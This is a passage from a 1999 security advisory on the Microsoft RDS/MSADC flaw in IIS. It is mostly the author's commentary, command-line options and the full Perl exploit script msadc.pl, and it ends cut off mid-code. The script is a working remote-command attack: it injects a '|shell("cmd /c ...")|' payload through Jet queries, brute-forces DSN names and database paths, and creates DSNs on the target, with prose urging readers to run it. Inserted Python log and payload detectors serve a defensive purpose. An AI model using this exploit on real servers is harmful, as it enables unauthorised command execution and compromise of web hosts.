     interpreter ( you can put VBA commands in the CALC() function--except it
     lacks shell()), and is a primary suspect in my eyes. The bonus is that
     you do *not* need any database files to use this. Well, barring the fact
     that I really don't know what I'm doing, I played around with it trying to
     feed some pipe-VBA-shells to it and whatnot, but couldn't get anything
     interesting to happen. Now, this is installed by default, has VBA hooks
     already, doesn't need a database, etc. I say this fits the description
     more than the btcustmr.mdb thing. And it's just all together 'cooler'.

     2. Index Server Provider. Now, not all places use Index Server, so I
     highly doubted this was the route, but it is a contender. Again, you
     don't need a database file, so that's a bonus. I tried the usual
     pipe-VBA-shell commands, but no go either.

     If I really had to choose, I'd say the exploit was in the Data Shape
     Provider (which Microsoft also warned of in the advisory). But since I
     couldn't get it to give me love, I went with btcustmr.mdb.

     - 4 - Bonus Aspects of My Version of the Exploit

     So, yes, I could be wrong. But I figure why not just feature pack this
     exploit to *really* kick some ass? Well, so, I wasted a few brain cells
     (the things I do for you people...jeez) and thought of some good things to
     toss into the code. I figure hey, might as well make this a useful tool!

     The first one is pretty obvious. There are many server-side applications
     on the market that create or require a DSN. For instance Cold Fusion
     creates a few DSNs, as does iHTML. Some of the sample apps that come with
     IIS create DSNs as well, and the MDAC makes a few too. All these potential
     DSNs. Remember, it only takes one DSN to work. So if we wanted to, we
     could scan to see if any of a number of default DSNs exist, and if they
     do, exploit them.

     An extension of this would be user created DSNs. Again, all we need is
     the DSN name, so we can scan for what are 'psychologically' common DSN
     names. For instance test, web, data, database, www, db, and sql are
     common type DSN names. Basically, if you supply a dictionary file of DSN
     names you want to use, the exploit will sit there and brute force, a la a
     remote password cracker on the DSN names.

     Of course, we'd need DSNs with the Access Driver. But what's nice
     is that if we connect to a valid DSN with an invalid SQL query, we'll get
     back the name of the driver in the error message. So it's a nice way to
     check.

     Then we can also do an inverse type thing--instead of looking for
     common DSNs to connect to, we can look for common .mdbs to connect to.
     For instance MS Cert Server, DHCP, and WINS all use .mdbs, as well as
     particular sample scripts, SDKs, etc. We can just try to connect to them
     directly. If we find one, rather than dealing with the table information
     within the .mdb, we can just CREATE TABLE on it first, and then exploit
     the table we just created. Very simple. 

     Another interesting feature is dumping the root scope paths from Index
     Server. Basically it's a query of "Select paths from scope()". This is
     useful because it can provide us with useful directory information...since
     one of the tricky problems is determining location of html files and
     systemroot (although they're most likely guessable, that's not always the
     case). So I tossed this in for kicks, although it doesn't run 'inline'
     with the actual exploit checks. You invoke this functionality
     separately.

     The last extra functionality, but the easiest of them all, is to see if
     /scripts/tools/newdsn.exe (the IIS sample DSN-creation tool, which is what
     the code below actually requests) exists on the webserver. If it does, we
     can make a DSN and define the .mdb file to use, and then exploit it right
     away. In my particular exploit I make a DSN named 'wicca'. (Greetings to
     Simple Nomad! I wish you could have been around at DefCon. Next time.)

     So, wow. Lots of ways to get a database connection. My RDS exploit
      tries them in the following order, continuing until successful:
      
      - try raw driver connect to btcustmr.mdb
      - try to create a DSN with /scripts/tools/newdsn.exe
      - look for common DSNs
      - look for common .mdbs
      - try 'dictionary' attack on user DSNs
      
      And separately you can query Index Server to get the paths information
      (Warning: this could be a lot of information! The script automatically
      sorts out common directories).
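     The attempt sequence above leaves a recognisable trail in the web server
     log: a GET probe of /msadc/msadcs.dll, a burst of POSTs to
     AdvancedDataFactory.Query while DSNs and .mdb paths are guessed, and a
     GET to /scripts/tools/newdsn.exe when the tool tries to create its own
     DSN. The following is an added example, not part of the advisory or of
     msadc.pl: a small detector run over IIS W3C extended log lines. The
     request paths are the ones the script on this page sends; the log lines
     are constructed here, the field order is the one declared in the
     constructed #Fields header (not a guaranteed IIS default), and the
     POST_THRESHOLD value is an assumed tuning knob.

```python
"""Detect the msadc.pl request sequence in IIS W3C extended logs.
Added example; the log lines below are constructed, not captured."""
from collections import defaultdict
from urllib.parse import parse_qs

# Constructed sample log. Field order comes from the #Fields line.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Server 4.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
1999-07-25 03:12:01 192.0.2.44 GET /msadc/msadcs.dll - 200 ACTIVEDATA
1999-07-25 03:12:02 192.0.2.44 POST /msadc/msadcs.dll/AdvancedDataFactory.Query - 200 ACTIVEDATA
1999-07-25 03:12:03 192.0.2.44 POST /msadc/msadcs.dll/AdvancedDataFactory.Query - 200 ACTIVEDATA
1999-07-25 03:12:04 192.0.2.44 GET /scripts/tools/newdsn.exe driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=wicca&dbq=c%3A%5Csys.mdb&newdb=CREATE_DB&attr= 200 ACTIVEDATA
1999-07-25 03:12:05 192.0.2.44 POST /msadc/msadcs.dll/AdvancedDataFactory.Query - 200 ACTIVEDATA
1999-07-25 03:15:00 198.51.100.7 GET /default.htm - 200 Mozilla/4.0
1999-07-25 03:16:10 198.51.100.9 POST /msadc/msadcs.dll/AdvancedDataFactory.Query - 200 Mozilla/4.0
"""

# Paths taken from msadc.pl (has_msadc, make_header, make_dsn).
RDS_QUERY = "/msadc/msadcs.dll/advanceddatafactory.query"
RDS_PROBE = "/msadc/msadcs.dll"
NEWDSN = "/scripts/tools/newdsn.exe"
POST_THRESHOLD = 3   # assumed: this many Query calls from one client looks like guessing


def parse_w3c(text):
    """Yield one dict per log record, keyed by the names in the #Fields line.
    Records before any #Fields line, directives and malformed lines are skipped."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed record; a real pipeline would count these
        yield dict(zip(fields, parts))


def detect(text):
    """Return {client ip: counters + verdict} for the exploit stages seen."""
    per_ip = defaultdict(lambda: {"probe": 0, "query_posts": 0,
                                  "newdsn": 0, "dsn_names": set()})
    for rec in parse_w3c(text):
        f = per_ip[rec["c-ip"]]
        stem = rec["cs-uri-stem"].lower()
        method = rec["cs-method"].upper()
        if method == "POST" and stem == RDS_QUERY:
            f["query_posts"] += 1
        elif method == "GET" and stem == RDS_PROBE:
            f["probe"] += 1
        elif stem == NEWDSN:
            f["newdsn"] += 1
            # the DSN name the attacker asked newdsn.exe to create
            for name in parse_qs(rec["cs-uri-query"]).get("dsn", []):
                f["dsn_names"].add(name)

    findings = {}
    for ip, f in per_ip.items():
        if (f["newdsn"] or f["query_posts"] >= POST_THRESHOLD
                or (f["probe"] and f["query_posts"])):
            verdict = "exploit"
        elif f["query_posts"]:
            verdict = "suspicious"   # a lone Query call may be a legitimate RDS client
        else:
            verdict = "clean"
        findings[ip] = dict(f, verdict=verdict)
    return findings


if __name__ == "__main__":
    for ip, f in detect(SAMPLE_LOG).items():
        print(ip, f["verdict"], f)
```

     Note that a legitimate RDS client hits the same Query path with the same
     ACTIVEDATA user agent, so the verdict rests on the sequence (probe, then
     a run of Query calls, then newdsn.exe) rather than on any single line.
     The POST body, which is where the shell() payload lives, is not in the
     log at all.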
      
      ----- Campaign solicitation --------------------------------------------
      
      XOR!! The unofficial AES candidate!
      
      There are many reasons why you should support XOR:
      1. It's mad fast!
      2. It can be implemented in very little code
      3. It will run with decent performance even on the meekest of 
      Casio watches
      4. The ciphertext doesn't look like the plaintext--this is good.
      5. Stream, block, chained, unchained, XOR does it all!
      6. So many companies already use it as their encryption algo of choice!
      
      So join the 'AES XOR y2k == 8w8' campaign today!
      
      ------------------------------------------------------------------------
      
      One interesting feature that's almost necessary is a 'resume' mode.
      Imagine you just scanned a webserver, spending the last 5 minutes trying
      all the combinations of valid default .mdbs, valid DSNs, etc. Finally it
      cracks and you get one, and you run your command. Well, what if you want
      to run another command? Do you have to go through that rigmarole again?
      Well, not with my script. :) When you make a successful connection, it
      writes out a file called 'rds.save'. Then, you can just use the 'resume'
      switch (-R), with no other options. It will read in rds.save, and let you
      run a command against the successful connection again right away.
      
      Sound good so far? Ok, I'll briefly go through the command line 
      options.
      
      - 5 - Command Line Options
      
      To run the program, just save this whole advisory to a file, such as 
      msadc.pl. Then run "perl -x msadc.pl". Perl is smart and will figure out
      how to run the exploit at the end. No need to cut and paste. :)
      
      Ok, the command switches are as follows:
      
      -h <ip or domain>        this is the host to scan. You MUST use
       either -h or -R.
      
      -d <value 0-?>                this is the delay between connections.
       Value is in number of seconds. I added
       this because hammering the RDS components
       caused the server to occasionally stop
       responding :) Defaults to 1. Use -d 0
       to disable.
      
      -v                        verbose. This will print the ODBC error
       information. Really only for
       troubleshooting purposes.
      
      -e                        external dictionary file to use on step
       5--the 'DSN dictionary guess' stage. The
       file should just be plaintext, one DSN
       name per line file with all the DSN names
       you want to try. Quite honestly a normal
       dictionary file won't do you much good.
       You can probably do pretty damn well with
       a dozen or two good ones, like 'www',
       'data', 'database', 'sql', etc.
      
      -R                        resume. You can still specify -v or -d
       with -R. This will cause the script to
       read in rds.save and execute the command
       on the last valid connection.
      
      -X                        perform an Index Server table dump instead.
       None of the other switches really apply
       here, other than -v (although -d still
       works, there's no need to slow down one
       query). This dumps the root paths from
       Index Server, which can be rather lengthy.
       I suggest you pipe the output into a file.
       Also, if there is a lot of return
       information, this command may take a while
       to complete. Be patient. And I don't
       suggest you use this command more than
       once a minute...it caused my P200 w/
       128 RAM to stop answering requests, and
       in general borked inetinfo.exe. If you do
       decide to CONTROL-C during the middle of the
       data download the script will save all
       received data into a file called 'raw.out',
       so you don't lose everything you've
       already received. NOTE: this is the raw
       data, which is in Unicode.

     - 6 - Random Q & A

     - "This or that function of the script is broken"
     -- Well, it wasn't broken when I used it, so you must have broken it.
             No, seriously. I've tested it on Linux, L0pht tested it on
             Solaris, and Vacuum tested it on NT (using Perl 5.005-03 for 
             Windows). They worked for us. I've coded some various checks
             for errors, but nothing robust. But I know it worked for me. :)

     - "Why don't you code this in C?"
     -- Because I've been programming C/C++ for 8 years. I'm tired of it. 
             I've been coding perl for 3, so it's new and fresh, and I'm just
             now starting to do interesting stuff. Plus the code is portable
             this way. Come on, where else can you have a piece of code that
             does network/socket level stuff that runs on NT, Linux, and Solaris 
             with no changes??!?

     - "Are you going to port this to C?"
     -- It wouldn't be that hard at all, but wasn't planning on it. You have
             something against perl?

     - "What's the F in Russell F. Prigogine stand for?"
     -- Fabio. Fear the geese.

     - "Why do you act like this is a joke?"
     -- Because I don't get paid for doing this, I don't get donations, and I
             don't get any sexual gratification from this whatsoever. I
             do this because I *like* to, because it's *FUN*--so damn it,
             I'm having fun!

     - "I don't get some of the jokes in the paper. Like what's FMP?"
     -- If you have to ask, you wouldn't understand. This advisory is
             teeming with inside jokes. RFP, FMP.

     - 7 - Signoff

     Ok, I've been coding the exploit, reading MS database propaganda (did I
     mention yet I hate database stuff?), and writing this damn advisory for a
     collective 30 hours. About time I stop and never think about it again.
     :)

     So you have my best shot at the RDS exploit, even though I think there may
     be something pretty nifty hiding in the Data Shape Provider (or maybe
     Index Server). We'll just have to wait and see if/when Greg and Russ
     finally decide they can share their toys.

     Remember, I spent 2 days typing all this in an attempt to teach people
     something, rather than to just release the vanilla exploit. So if you
     want to label me irresponsible, well, I suppose I could have been more so.
     Moreover, I support eEye in what they did 100%. Russ says "there are
     numerous unwritten rules when it comes to security disclosures". Rules?
     Unwritten? Well, maybe eEye was unaware of these rules, since they're not
     written down. 

     Future updates to this advisory and exploit code will be posted to

             www.technotronic.com/rfp/ 

     Well, it's been fun. Until the next release (which may be sooner than
     you think ;)

                     - rain forest puppy / R. F. Prigogine -

                      - ADM / Wiretrip -

                              - rfp@wiretrip.net -



             *** SPECIAL THANKS once again to Mudge and Weld from 
             www.l0pht.com for helping me out on the preliminary 
             assessment, and Mike Dinowitz from www.houseoffusion.com 
             and Vacuum from www.technotronic.com for creative input.


              Time is creation. The future is just not there.


     - 8 - The Code!!!!

     Again, to run this, save this advisory to a file (for instance
     msadc.txt) and then run 'perl -x file' (ie perl -x msadc.txt).

     #!perl
     #
     # MSADC/RDS 'usage' (aka exploit) script
     #
     #        by rain.forest.puppy
     #
     # Many thanks to Weld, Mudge, and Dildog from l0pht for helping me
     # beta test and find errors!

     use Socket; use Getopt::Std;
     getopts("e:vd:h:XR", \%args);

     print "-- RDS exploit by rain forest puppy / ADM / Wiretrip --\n";

     if (!defined $args{h} && !defined $args{R}) {
     print qq~
     Usage: msadc.pl -h <host> { -d <delay> -X -v }
             -h <host>         = host you want to scan (ip or domain)
             -d <seconds>        = delay between calls, default 1 second
             -X                = dump Index Server path table, if available
             -v                = verbose
             -e                = external dictionary file for step 5

             Or a -R will resume a command session

     ~; exit;}

     $ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target="";
     if (defined $args{v}) { $verbose=1; } else {$verbose=0;} 
     if (defined $args{d}) { $delay=$args{d};} else {$delay=1;}
     if(!defined $args{R}){ $ip.="." if ($ip=~/[a-z]$/);
     $target= inet_aton($ip) || die("inet_aton problems; host doesn't exist?");}
     if (defined $args{X} && !defined $args{R}) { &hork_idx; exit; }

     if (!defined $args{R}){ $ret = &has_msadc;
     die("Looks like msadcs.dll doesn't exist\n")if $ret==0}

     print "Please type the NT commandline you want to run (cmd /c assumed):\n"
             . "cmd /c ";
     $in=<STDIN>; chomp $in;
     $command="cmd /c " . $in ;

     if (defined $args{R}) {&load; exit;}

     print "\nStep 1: Trying raw driver to btcustmr.mdb\n";
     &try_btcustmr;

     print "\nStep 2: Trying to make our own DSN...";
     &make_dsn ? print "<<success>>\n" : print "<<fail>>\n";

     print "\nStep 3: Trying known DSNs...";
     &known_dsn;

     print "\nStep 4: Trying known .mdbs...";
     &known_mdb;

     if (defined $args{e}){
     print "\nStep 5: Trying dictionary of DSN names...";
     &dsn_dict; } else { print "\nNo -e; Step 5 skipped.\n\n"; }

     print "Sorry Charley...maybe next time?\n";
     exit;

     ##############################################################################

     sub sendraw {         # ripped and modded from whisker
             sleep($delay); # it's a DoS on the server! At least on mine...
             my ($pstr)=@_;
             socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                     die("Socket problems\n");
             if(connect(S,pack "SnA4x8",2,80,$target)){
                     select(S); $|=1;
                     print $pstr; my @in=<S>;
                     select(STDOUT); close(S);
                     return @in;
             } else { die("Can't connect...\n"); }}
      
      ##############################################################################
      
      sub make_header { # make the HTTP request
      my $msadc=<<EOT
      POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1
      User-Agent: ACTIVEDATA
      Host: $ip
      Content-Length: $clen
      Connection: Keep-Alive
      
      ADCClientVersion:01.06
      Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3
      
      --!ADM!ROX!YOUR!WORLD!
      Content-Type: application/x-varg
      Content-Length: $reqlen
      
      EOT
      ; $msadc=~s/\n/\r\n/g;
      return $msadc;}
      
      ##############################################################################
      
      sub make_req { # make the RDS request
      my ($switch, $p1, $p2)=@_;
      my $req=""; my ($t1, $t2, $query, $dsn);
      
      if ($switch==1){ # this is the btcustmr.mdb query
      $query="Select * from Customers where City=" . make_shell();
      $dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" .
      $p1 . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";}
      
      elsif ($switch==2){ # this is general make table query
      $query="create table AZZ (B int, C varchar(10))";
      $dsn="$p1";}
      
      elsif ($switch==3){ # this is general exploit table query
      $query="select * from AZZ where C=" . make_shell();
      $dsn="$p1";}
      
      elsif ($switch==4){ # attempt to hork file info from index server
      $query="select path from scope()";
      $dsn="Provider=MSIDXS;";}
      
      elsif ($switch==5){ # bad query
      $query="select";
      $dsn="$p1";}
      
      $t1= make_unicode($query);
      $t2= make_unicode($dsn);
      $req = "\x02\x00\x03\x00";
      $req.= "\x08\x00" . pack ("S1", length($t1));
      $req.= "\x00\x00" . $t1 ;
      $req.= "\x08\x00" . pack ("S1", length($t2));
      $req.= "\x00\x00" . $t2 ;
      $req.="\r\n--!ADM!ROX!YOUR!WORLD!--\r\n";
      return $req;}
      
      ##############################################################################
      
      sub make_shell { # this makes the shell() statement
      return "'|shell(\"$command\")|'";}
      
      ##############################################################################
      
      sub make_unicode { # quick little function to convert to unicode
      my ($in)=@_; my $out;
      for ($c=0; $c < length($in); $c++) { $out.=substr($in,$c,1) . "\x00"; }
      return $out;}
      
      ##############################################################################
      
      sub rdo_success { # checks for RDO return success (this is kludge)
      my (@in) = @_; my $base=content_start(@in);
      if($in[$base]=~/multipart\/mixed/){
      return 1 if( $in[$base+10]=~/^\x09\x00/ );}
      return 0;}
      
      ##############################################################################
      
      sub make_dsn { # this makes a DSN for us
      my @drives=("c","d","e","f");
      print "\nMaking DSN: ";
      foreach $drive (@drives) {
      print "$drive: ";
      my @results=sendraw("GET /scripts/tools/newdsn.exe?driver=Microsoft\%2B" .
      "Access\%2BDriver\%2B\%28*.mdb\%29\&dsn=wicca\&dbq="
      . $drive . "\%3A\%5Csys.mdb\&newdb=CREATE_DB\&attr= HTTP/1.0\n\n");
      $results[0]=~m#HTTP\/([0-9\.]+) ([0-9]+) ([^\n]*)#;
      return 0 if $2 eq "404"; # not found/doesn't exist
      if($2 eq "200") {
      foreach $line (@results) {
      return 1 if $line=~/<H2>Datasource creation successful<\/H2>/;}}
      } return 0;}
      
      ##############################################################################
      
      sub verify_exists {
      my ($page)=@_;
      my @results=sendraw("GET $page HTTP/1.0\n\n");
      return $results[0];}
      
      ##############################################################################
      
      sub try_btcustmr {
      my @drives=("c","d","e","f");
      my @dirs=("winnt","winnt35","winnt351","win","windows");
      
      foreach $dir (@dirs) {
      print "$dir -> "; # fun status so you can see progress
      foreach $drive (@drives) {
      print "$drive: "; # ditto
      $reqlen=length( make_req(1,$drive,$dir) ) - 28;
      $reqlenlen=length( "$reqlen" );
      $clen= 206 + $reqlenlen + $reqlen;
      
      my @results=sendraw(make_header() . make_req(1,$drive,$dir));
      if (rdo_success(@results)){print "Success!\n";save(1,1,$drive,$dir);exit;}
      else { verbose(odbc_error(@results)); funky(@results);}} print "\n";}}
      
      ##############################################################################
      
      sub odbc_error {
      my (@in)=@_; my $base;
      my $base = content_start(@in);
      if($in[$base]=~/application\/x-varg/){ # it *SHOULD* be this
      $in[$base+4]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
      $in[$base+5]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
      $in[$base+6]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
      return $in[$base+4].$in[$base+5].$in[$base+6];}
      print "\nNON-STANDARD error. Please send this info to rfp\@wiretrip.net:\n";
     print "$in : " . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] .
             $in[$base+4] . $in[$base+5] . $in[$base+6]; exit;}

     ##############################################################################

     sub verbose {
     my ($in)=@_;
     return if !$verbose;
     print STDOUT "\n$in\n";}

     ##############################################################################

     sub save {
     my ($p1, $p2, $p3, $p4)=@_;
     open(OUT, ">rds.save") || print "Problem saving parameters...\n";
     print OUT "$ip\n$p1\n$p2\n$p3\n$p4\n";
     close OUT;}

     ##############################################################################

     sub load {
     my @p; my $drvst="driver={Microsoft Access Driver (*.mdb)}; dbq=";
     open(IN,"<rds.save") || die("Couldn't open rds.save\n");
     @p=<IN>; close(IN);
     $ip="$p[0]"; $ip=~s/\n//g; $ip.="." if ($ip=~/[a-z]$/);
     $target= inet_aton($ip) || die("inet_aton problems");
     print "Resuming to $ip ...";
     $p[3]="$p[3]"; $p[3]=~s/\n//g; $p[4]="$p[4]"; $p[4]=~s/\n//g;
     if($p[1]==1) {
     $reqlen=length( make_req(1,"$p[3]","$p[4]") ) - 28;
     $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen;
     my @results=sendraw(make_header() . make_req(1,"$p[3]","$p[4]"));
     if (rdo_success(@results)){print "Success!\n";}
     else { print "failed\n"; verbose(odbc_error(@results));}}
     elsif ($p[1]==3){
             if(run_query("$p[3]")){
             print "Success!\n";} else { print "failed\n"; }}
     elsif ($p[1]==4){
             if(run_query($drvst . "$p[3]")){
             print "Success!\n"; } else { print "failed\n"; }}
     exit;}

     ##############################################################################

     sub create_table {
     my ($in)=@_;
     $reqlen=length( make_req(2,$in,"") ) - 28;
     $reqlenlen=length( "$reqlen" );
     $clen= 206 + $reqlenlen + $reqlen;
     my @results=sendraw(make_header() . make_req(2,$in,""));
     return 1 if rdo_success(@results);
     my $temp= odbc_error(@results); verbose($temp);
     return 1 if $temp=~/Table 'AZZ' already exists/;
     return 0;}

     ##############################################################################

     sub known_dsn {
     # we want 'wicca' first, because if step 2 made the DSN, it's ready to go
     my @dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications",
             "cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM",
             "banner", "banners", "ads", "ADCDemo", "ADCTest");

     foreach $dSn (@dsns) {
             print ".";
             next if (!is_access("DSN=$dSn"));
             if(create_table("DSN=$dSn")){
             print "$dSn successful\n";
             if(run_query("DSN=$dSn")){
             print "Success!\n"; save (3,3,"DSN=$dSn",""); exit; } else { 
     print "Something's borked. Use verbose next time\n";}}} print "\n";}

     ##############################################################################

     sub is_access {
     my ($in)=@_;
     $reqlen=length( make_req(5,$in,"") ) - 28;
     $reqlenlen=length( "$reqlen" );
     $clen= 206 + $reqlenlen + $reqlen;
     my @results=sendraw(make_header() . make_req(5,$in,""));
     my $temp= odbc_error(@results);
     verbose($temp); return 1 if ($temp=~/Microsoft Access/);
     return 0;}

     ##############################################################################

     sub run_query {
     my ($in)=@_;
     $reqlen=length( make_req(3,$in,"") ) - 28;
     $reqlenlen=length( "$reqlen" );
     $clen= 206 + $reqlenlen + $reqlen;
     my @results=sendraw(make_header() . make_req(3,$in,""));
     return 1 if rdo_success(@results);
     my $temp= odbc_error(@results); verbose($temp);
     return 0;}

     ##############################################################################

     sub known_mdb {
     my @drives=("c","d","e","f","g");
     my @dirs=("winnt","winnt35","winnt351","win","windows");
     my ($dir, $drive, $mdb);
     my $drv="driver={Microsoft Access Driver (*.mdb)}; dbq=";

     # this is sparse, because I don't know of many
     my @sysmdbs=(        "\\catroot\\icatalog.mdb",
                     "\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb",
                     "\\system32\\certmdb.mdb",
                     "\\system32\\certlog\\certsrv.mdb" ); #these are %systemroot%

     my @mdbs=(        "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb",
                     "\\cfusion\\cfapps\\forums\\forums_.mdb",
                     "\\cfusion\\cfapps\\forums\\data\\forums.mdb",
                     "\\cfusion\\cfapps\\security\\realm_.mdb",
                     "\\cfusion\\cfapps\\security\\data\\realm.mdb",
                     "\\cfusion\\database\\cfexamples.mdb",
                     "\\cfusion\\database\\cfsnippets.mdb",
                     "\\inetpub\\iissamples\\sdk\\asp\\database\\authors.mdb",
                     "\\progra~1\\common~1\\system\\msadc\\samples\\advworks.mdb",
                     "\\cfusion\\brighttiger\\database\\cleam.mdb",
                     "\\cfusion\\database\\smpolicy.mdb",
                     "\\cfusion\\database\\cypress.mdb",
             "\\progra~1\\ableco~1\\ablecommerce\\databases\\acb2_main1.mdb",
                     "\\website\\cgi-win\\dbsample.mdb",
             "\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb",
             "\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb"
                     ); #these are just \

     foreach $drive (@drives) {
     foreach $dir (@dirs){
     foreach $mdb (@sysmdbs) {
     print ".";
     if(create_table($drv . $drive . ":\\" . $dir . $mdb)){
     print "\n" . $drive . ":\\" . $dir . $mdb . " successful\n";
     if(run_query($drv . $drive . ":\\" . $dir . $mdb)){
     print "Success!\n"; save (4,4,$drive . ":\\" . $dir . $mdb,""); exit; 
     } else { print "Something's borked. Use verbose next time\n"; }}}}}

     # these paths are rooted at the drive, not under %systemroot%, so no $dir
     foreach $drive (@drives) {
     foreach $mdb (@mdbs) {
     print ".";
     if(create_table($drv . $drive . ":" . $mdb)){
     print "\n" . $drive . ":" . $mdb . " successful\n";
     if(run_query($drv . $drive . ":" . $mdb)){
     print "Success!\n"; save (4,4,$drive . ":" . $mdb,""); exit;
     } else { print "Something's borked. Use verbose next time\n"; }}}}
     }

     ##############################################################################

     sub hork_idx {
     print "\nAttempting to dump Index Server tables...\n";
     print " NOTE: Sometimes this takes a while, other times it stalls\n\n";
     $reqlen=length( make_req(4,"","") ) - 28;
     $reqlenlen=length( "$reqlen" );
     $clen= 206 + $reqlenlen + $reqlen;
     my @results=sendraw2(make_header() . make_req(4,"",""));
     if (rdo_success(@results)){
     my $max=@results; my $c; my %d;
     for($c=19; $c<$max; $c++){
             $results[$c]=~s/\x00//g;
             $results[$c]=~s/[^a-zA-Z0-9:~ \\\._]{1,40}/\n/g;
             $results[$c]=~s/[^a-zA-Z0-9:~ \\\._\n]//g;
             $results[$c]=~/([a-zA-Z]\:\\)([a-zA-Z0-9 _~\\]+)\\/;
             $d{"$1$2"}="";}
     foreach $c (keys %d){ print "$c\n"; }
     } else {print "Index server doesn't seem to be installed.\n"; }}

     ##############################################################################

     sub dsn_dict {
     open(IN, "<$args{e}") || die("Can't open external dictionary\n");
     while(<IN>){
             $hold=$_; $hold=~s/[\r\n]//g; $dSn="$hold"; print ".";
             next if (!is_access("DSN=$dSn"));
             if(create_table("DSN=$dSn")){
             print "$dSn successful\n";
             if(run_query("DSN=$dSn")){
             print "Success!\n"; save (3,3,"DSN=$dSn",""); exit; } else { 
     print "Something's borked. Use verbose next time\n";}}} 
     print "\n"; close(IN);}

     ##############################################################################

     sub sendraw2 {         # ripped and modded from whisker
             sleep($delay); # it's a DoS on the server! At least on mine...
             my ($pstr)=@_;
             socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                     die("Socket problems\n");
             if(connect(S,pack "SnA4x8",2,80,$target)){
                     print "Connected. Getting data";
                     open(OUT,">raw.out"); my @in;
                     select(S);        $|=1;         print $pstr;                
                     while(<S>){ print OUT $_; push @in, $_; print STDOUT ".";}
                     close(OUT); select(STDOUT); close(S); return @in;
             } else { die("Can't connect...\n"); }}

     ##############################################################################

     sub content_start { # this will take in the server headers
     my (@in)=@_; my $c;
     for ($c=1;$c<500;$c++) { 
     if($in[$c] =~/^\x0d\x0a/){
     if ($in[$c+1]=~/^HTTP\/1.[01] [12]00/) { $c++; }
     else { return $c+1; }}}
     return -1;} # it should never get here actually 

     ##############################################################################

     sub funky {
     my (@in)=@_; my $error=odbc_error(@in);
     if($error=~/ADO could not find the specified provider/){
     print "\nServer returned an ADO misconfiguration message\nAborting.\n";
     exit;}
     if($error=~/A Handler is required/){
     print "\nServer has custom handler filters (they most likely are patched)\n";
     exit;}
     if($error=~/specified Handler has denied Access/){
     print "\nServer has custom handler filters (they most likely are patched)\n";
     exit;}}

     ##############################################################################

     sub has_msadc {
     my @results=sendraw("GET /msadc/msadcs.dll HTTP/1.0\n\n");
     my $base=content_start(@results);
     return 1 if($results[$base]=~/Content-Type: application\/x-varg/);
     return 0;}

     ##############################################################################
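     The make_req() routine above shows what actually goes over the wire in
     the Query call: a 4-byte header, then each argument as a 2-byte variant
     type (0x0008, a BSTR), a 4-byte little-endian byte length and the string
     in UTF-16LE. What follows is an added example, not code from the advisory
     or from msadc.pl: a decoder for that argument block plus a classifier
     that flags the patterns the exploit depends on (the '|shell(...)|' Jet
     VBA pipe in the query, an Access driver pointed at an on-disk .mdb, or at
     a UNC path as in the follow-up post later on this page). The wire layout
     is taken from make_req() as rfp packs it on a little-endian host and is
     an assumption for anything else; the sample bodies are constructed here.

```python
"""Decode and classify the application/x-varg body of an RDS
AdvancedDataFactory.Query call. Added example; layout assumed from
make_req() in msadc.pl, sample bodies constructed below."""
import re
import struct

HEADER = b"\x02\x00\x03\x00"   # as emitted by make_req(); meaning not documented there
VT_BSTR = 0x0008


def encode_varg(*args):
    """Mirror of make_req()'s packing; used here only to build sample input."""
    out = bytearray(HEADER)
    for a in args:
        payload = a.encode("utf-16-le")
        out += struct.pack("<HI", VT_BSTR, len(payload)) + payload
    return bytes(out)


def decode_varg(body):
    """Return the list of string arguments in an x-varg block.
    Raises ValueError on a bad header, unknown type or truncated data."""
    if not body.startswith(HEADER):
        raise ValueError("bad x-varg header")
    pos = len(HEADER)
    args = []
    while pos < len(body):
        if pos + 6 > len(body):
            raise ValueError("truncated argument header")
        vtype, length = struct.unpack_from("<HI", body, pos)
        pos += 6
        if vtype != VT_BSTR:
            raise ValueError("unsupported variant type 0x%04x" % vtype)
        if pos + length > len(body):
            raise ValueError("truncated argument payload")
        args.append(body[pos:pos + length].decode("utf-16-le"))
        pos += length
    return args


# Jet VBA pipe escape, the form make_shell() produces: '|shell("...")|'
PIPE_VBA = re.compile(r"\|\s*shell\s*\(", re.IGNORECASE)
# connect string aiming the driver at a UNC share (follow-up post) ...
UNC_DBQ = re.compile(r"dbq\s*=\s*\\\\", re.IGNORECASE)
# ... or at a local .mdb by drive letter (the btcustmr.mdb / known-mdb steps)
MDB_DBQ = re.compile(r"dbq\s*=\s*[a-z]:\\", re.IGNORECASE)


def classify(body):
    """Decode a Query call and report which exploit indicators it carries."""
    try:
        args = decode_varg(body)
    except ValueError as e:
        return {"decodable": False, "error": str(e)}
    query = args[0] if len(args) > 0 else ""
    dsn = args[1] if len(args) > 1 else ""
    return {
        "decodable": True,
        "query": query,
        "dsn": dsn,
        "pipe_vba_shell": bool(PIPE_VBA.search(query)),
        "unc_dbq": bool(UNC_DBQ.search(dsn)),
        "raw_mdb_dbq": bool(MDB_DBQ.search(dsn)),
        "create_table": query.lower().lstrip().startswith("create table"),
    }


# Constructed samples modelled on make_req() switch cases 1, 3 and 4.
EXPLOIT_BODY = encode_varg(
    "Select * from Customers where City='|shell(\"cmd /c echo hi\")|'",
    "driver={Microsoft Access Driver (*.mdb)};"
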